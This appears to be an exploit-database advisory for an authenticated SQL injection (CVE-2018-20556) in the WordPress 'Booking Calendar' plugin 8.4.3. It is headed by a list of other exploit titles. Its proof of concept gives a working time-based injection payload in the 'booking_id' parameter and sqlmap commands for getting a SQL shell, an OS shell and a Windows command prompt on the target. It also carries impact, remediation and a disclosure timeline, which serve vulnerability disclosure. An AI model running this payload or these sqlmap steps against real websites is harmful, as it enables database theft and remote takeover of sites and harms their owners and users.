5f3f5c8f09
18 changes to exploits/shellcodes Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC) MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC) ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS) runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1) exacqVision ESM 5.12.2 - Privilege Escalation runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure) DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)
58 lines
No EOL
2.5 KiB
Text
58 lines
No EOL
2.5 KiB
Text
# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability
|
||
# Date: 2018-12-28
|
||
# Exploit Author: B0UG
|
||
# Vendor Homepage: https://wpbookingcalendar.com/
|
||
# Software Link: https://wordpress.org/plugins/booking/
|
||
# Version: Tested on version 8.4.3 (older versions may also be affected)
|
||
# Tested on: WordPress
|
||
# Category : Webapps
|
||
# CVE: CVE-2018-20556
|
||
|
||
#I. VULNERABILITY
|
||
|
||
Authenticated SQL Injection
|
||
|
||
#II. BACKGROUND
|
||
'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations.
|
||
|
||
#III. DESCRIPTION
|
||
An authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database.
|
||
|
||
#IV. PROOF OF CONCEPT
|
||
1) Access WordPress control panel.
|
||
2) Navigate to the Booking Calendar plugin page.
|
||
3) Set up Burp Suite to capture the traffic.
|
||
4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry.
|
||
5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'.
|
||
6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection:
|
||
• Boolean based blind injection
|
||
• Error based injection
|
||
• Time based injection
|
||
|
||
7) We can perform a time based SQL injection by appending ) AND SLEEP(100) AND (1=1 after the ID value in the parameter as shown below.
|
||
action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67
|
||
|
||
Obtaining a shell using sqlmap
|
||
-----------------------
|
||
• Obtain a SQL Shell
|
||
Sqlmap –r post-request.txt –p booking_id --sql-shell
|
||
|
||
• Obtain a Linux Shell
|
||
Sqlmap –r post-request.txt –p booking_id --os-shell
|
||
|
||
• Obtain a Windows Command Prompt
|
||
Sqlmap –r post-request.txt –p booking_id --os-cmd
|
||
|
||
#V. IMPACT
|
||
The vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability.
|
||
|
||
#VI. SYSTEMS AFFECTED
|
||
WordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected).
|
||
|
||
#VII. REMEDIATION
|
||
Uninstall the plugin until the vulnerability has been fixed by the developer.
|
||
|
||
#VIII. DISCLOSURE TIMELINE
|
||
#December 28, 2018 1: Vulnerability identified.
|
||
#December 28, 2018 2: Informed developer of the vulnerability.
|
||
#February 14, 2019 3: No communication received back from the developer. |